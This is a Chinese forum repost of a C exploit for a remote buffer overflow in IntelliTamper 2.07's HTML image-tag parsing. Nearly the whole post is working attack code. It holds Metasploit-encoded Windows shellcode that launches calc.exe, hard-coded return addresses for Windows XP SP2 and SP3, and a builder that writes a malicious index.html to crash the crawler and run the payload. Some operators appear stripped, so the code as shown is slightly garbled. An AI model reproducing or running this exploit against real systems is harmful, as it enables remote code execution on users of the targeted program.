• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

    发布者: 午夜收音机 | 发布时间: 2025-6-28 22:39| 查看数: 48| 评论数: 0|帖子模式

    /*
    * IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit
    *
    * Discovered & Written by r0ut3r (writ3r [at] gmail.com)
    * Many Thanks to Luigi Auriemma (http://aluigi.org)
    *
    * Greets to shinnai (http://www.shinnai.net)
    * and Guido Landi
    *
    * IntelliTamper contains a remote buffer overflow vulnerability.
    * The HTML parser, more precise the image tag fails to preform
    * boundary checks on supplied data.
    *
    * kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c
    * kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0
    * [!] OS: Microsoft Windows XP Pro SP 2
    * [ ] Building payload
    * [ ] Inserting JMP code
    * [ ] Success writing to index.html
    * kit:/home/r0ut3r/public_html/imgsrc-xpl #
    */#include <stdio.h>
    #include <stdlib.h>
    #include <string.h>/* win32_exec -  EXITFUNC=thread CMD=c:\windows\system32\calc.exe Size=184
    Encoder=PexFnstenvSub http://metasploit.com
    Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */
    unsigned char shellcode[] =
    "\x31\xc9\x83\xe9\xd8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x99"
    "\xeb\x8d\x6a\x83\xeb\xfc\xe2\xf4\x65\x03\xc9\x6a\x99\xeb\x06\x2f"
    "\xa5\x60\xf1\x6f\xe1\xea\x62\xe1\xd6\xf3\x06\x35\xb9\xea\x66\x23"
    "\x12\xdf\x06\x6b\x77\xda\x4d\xf3\x35\x6f\x4d\x1e\x9e\x2a\x47\x67"
    "\x98\x29\x66\x9e\xa2\xbf\xa9\x6e\xec\x0e\x06\x35\xbd\xea\x66\x0c"
    "\x12\xe7\xc6\xe1\xc6\xf7\x8c\x81\x12\xf7\x06\x6b\x72\x62\xd1\x4e"
    "\x9d\x28\xbc\xaa\xfd\x60\xcd\x5a\x1c\x2b\xf5\x66\x12\xab\x81\xe1"
    "\xe9\xf7\x20\xe1\xf1\xe3\x66\x63\x12\x6b\x3d\x6a\x99\xeb\x06\x02"
    "\xa5\xb4\xbc\x9c\xf9\xbd\x04\x92\x1a\x2b\xf6\x3a\xf1\x04\x43\x8a"
    "\xf9\x83\x15\x94\x13\xe5\xda\x95\x7e\x88\xb7\x36\xee\x82\xe3\x0e"
    "\xf6\x9c\xfe\x36\xea\x92\xfe\x1e\xfc\x86\xbe\x58\xc5\x88\xec\x06"
    "\xfa\xc5\xe8\x12\xfc\xeb\x8d\x6a";#define JMP 0xe9 //JMPint main(int argc, char* argv[])
    {
        FILE *fd;
        unsigned char buff[4000],
                    *jmpref,
                    *p;
        int opt;    struct
        {
            char *os;
            unsigned int eip;
        } targets[] =
            {
                "Microsoft Windows XP Pro SP 2",
                0x7d040e1f,            "Microsoft Windows XP Pro SP 3",
                0x7c8369f0
            };    if (argc < 2)
        {
            printf("---------------------------------------------------------\n");
            printf("     IntelliTamper 2.07 Remote Buffer Overflow Expoit    \n\n");        printf("  Discovered & Written by r0ut3r (writ3r [at] gmail.com)\n");
            printf("       Thanks to Luigi Auriemma (http://aluigi.org)\n\n");        printf("  Usage: %s <OS-type>\n", argv[0]);
            printf("      0: Microsoft Windows XP Pro SP2\n");
            printf("      1: Microsoft Windows XP Pro SP3\n");
            printf("---------------------------------------------------------\n");
            return 1;
        }    p = buff;    switch (atoi(argv[1]))
        {
            case 0:
                opt = 0;
                printf("[!] OS: %s\n", targets[0].os);
            break;        case 1:
                opt = 1;
                printf("[!] OS: %s\n", targets[1].os);
            break;
        }    printf("[ ] Building payload\n");
        p  = sprintf(p, "<img src=\"http://");    jmpref = p;    p  = sprintf(p, "%s", shellcode);    int i;
        int a = 3065 - (p - jmpref);
        for (i=0; i < a; i  )
            *p   = 'A';    *(unsigned int *) p = targets[opt].eip;
        p  = 4;    printf("[ ] Inserting JMP code\n");    *p   = JMP;
        *(unsigned int *) p = jmpref - (p   4); //JMP -(3065 4 5)
        p  = 4;    p  = sprintf(p, "\">");    fd = fopen("index.html", "wb");
        if (fd == NULL)
        {
            perror("[-] Failed opening index.html\n");
            return 1;
        }    fwrite(buff, 1, p - buff, fd);
        if (fclose(fd) == 0)
            printf("[ ] Success writing to index.html\n");
        else
            printf("[-] Failed writing to index.html\n");    return 0;
    }


    来源:https://www.jb51.net/hack/5601.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表